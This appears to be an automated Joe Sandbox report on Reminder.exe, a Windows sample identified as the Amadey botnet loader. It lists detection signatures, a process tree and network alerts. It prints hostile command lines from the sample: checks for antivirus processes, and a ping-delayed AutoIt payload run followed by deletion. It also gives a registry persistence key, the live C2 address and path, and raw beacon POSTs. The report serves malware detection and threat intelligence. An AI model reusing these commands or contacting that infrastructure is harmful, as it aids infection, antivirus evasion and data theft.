Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name:Reminder.exe
Analysis ID:1543320
MD5:df45696ef1463f335a6cc5dc72c607d0
SHA1:699eaf22d81b5dd5a7177641d9a784db7dd80eb9
SHA256:2e29ddac4856b370c1c8e7ebc3dd90afeafddaf932b17fcf91f1150d52ee28d7
Tags:ClickFixexeuser-monitorsg
Infos:

Detection

Amadey
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • Reminder.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\Reminder.exe" MD5: DF45696EF1463F335A6CC5DC72C607D0)
    • Reminder.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe" MD5: 45CC5C19328748F850CC9FE5E65AC9F3)
      • Reminder.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: DF45696EF1463F335A6CC5DC72C607D0)
        • Reminder.tmp (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: 45CC5C19328748F850CC9FE5E65AC9F3)
          • cmd.exe (PID: 2084 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 3844 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 280 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 2188 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6408 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 4544 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6548 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7024 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 5780 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 2872 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 5016 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 6636 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6952 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 2476 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 2056 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6536 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 2316 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 4544 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • Updater.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)
            • cmd.exe (PID: 5852 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 6092 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • Updater.exe (PID: 1612 cmdline: updater.exe C:\ProgramData\\huv9LF4.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
                • MSBuild.exe (PID: 5640 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
                • MSBuild.exe (PID: 2284 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • AutoIt3.exe (PID: 2536 cmdline: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
    • MSBuild.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 4936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 1732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • AutoIt3.exe (PID: 3272 cmdline: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
    • MSBuild.exe (PID: 6276 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 2792 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "152.89.198.124/8bdDsv3dk2FF/index.php", "Version": "5.03", "Install Folder": "e7e219b706", "Install File": "Gxtuum.exe"}
SourceRuleDescriptionAuthorStrings
0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          Process Memory Space: Updater.exe PID: 1612JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            35.2.Updater.exe.4292be0.1.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              38.2.AutoIt3.exe.44e2be0.1.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                42.2.AutoIt3.exe.4382be0.1.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  41.2.MSBuild.exe.400000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    38.2.AutoIt3.exe.44e2be0.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 3 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 152.89.198.124, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 57713
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\friend\Updater.exe, ProcessId: 1612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fkccfcd
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-27T17:11:06.682086+010028561471A Network Trojan was detected192.168.2.457736152.89.198.12480TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-27T17:11:04.069020+010028561481A Network Trojan was detected192.168.2.457723152.89.198.12480TCP
                      2024-10-27T17:11:09.075978+010028561481A Network Trojan was detected192.168.2.457751152.89.198.12480TCP
                      2024-10-27T17:11:14.044735+010028561481A Network Trojan was detected192.168.2.457783152.89.198.12480TCP
                      2024-10-27T17:11:18.955990+010028561481A Network Trojan was detected192.168.2.457808152.89.198.12480TCP
                      2024-10-27T17:11:23.888441+010028561481A Network Trojan was detected192.168.2.457835152.89.198.12480TCP
                      2024-10-27T17:11:29.299694+010028561481A Network Trojan was detected192.168.2.457862152.89.198.12480TCP
                      2024-10-27T17:11:34.330315+010028561481A Network Trojan was detected192.168.2.457893152.89.198.12480TCP
                      2024-10-27T17:11:39.303022+010028561481A Network Trojan was detected192.168.2.457920152.89.198.12480TCP
                      2024-10-27T17:11:44.290710+010028561481A Network Trojan was detected192.168.2.457947152.89.198.12480TCP
                      2024-10-27T17:11:49.677794+010028561481A Network Trojan was detected192.168.2.457979152.89.198.12480TCP
                      2024-10-27T17:11:54.997339+010028561481A Network Trojan was detected192.168.2.457998152.89.198.12480TCP
                      2024-10-27T17:11:59.950646+010028561481A Network Trojan was detected192.168.2.458000152.89.198.12480TCP
                      2024-10-27T17:12:04.953738+010028561481A Network Trojan was detected192.168.2.458002152.89.198.12480TCP
                      2024-10-27T17:12:09.870564+010028561481A Network Trojan was detected192.168.2.458004152.89.198.12480TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "152.89.198.124/8bdDsv3dk2FF/index.php", "Version": "5.03", "Install Folder": "e7e219b706", "Install File": "Gxtuum.exe"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
                      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
                      Source: Reminder.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_0073E180
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_0074A187
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_0074A2E4
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,35_2_0074A66E
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose,35_2_0074686D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose,35_2_0073E9BA
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007474F0 FindFirstFileW,FindClose,35_2_007474F0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,35_2_00747591
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_0073DE32
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,35_2_014A3ECD
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,35_2_014A17FD
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A3FD5 FindFirstFileA,GetLastError,35_2_014A3FD5
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA187
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDE180
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA2E4
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA66E
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose,38_2_00CE686D
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE9BA
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE74F0 FindFirstFileW,FindClose,38_2_00CE74F0
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,38_2_00CE7591
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDE32
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,38_2_01653765
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,38_2_01651095
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0165386D FindFirstFileA,GetLastError,38_2_0165386D

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:57736 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57723 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57783 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57751 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57808 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57835 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57893 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57862 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58000 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58002 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57920 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57947 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57979 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57998 -> 152.89.198.124:80
                      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58004 -> 152.89.198.124:80
                      Source: Malware configuration extractorIPs: 152.89.198.124
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                      Source: global trafficTCP traffic: 192.168.2.4:57709 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
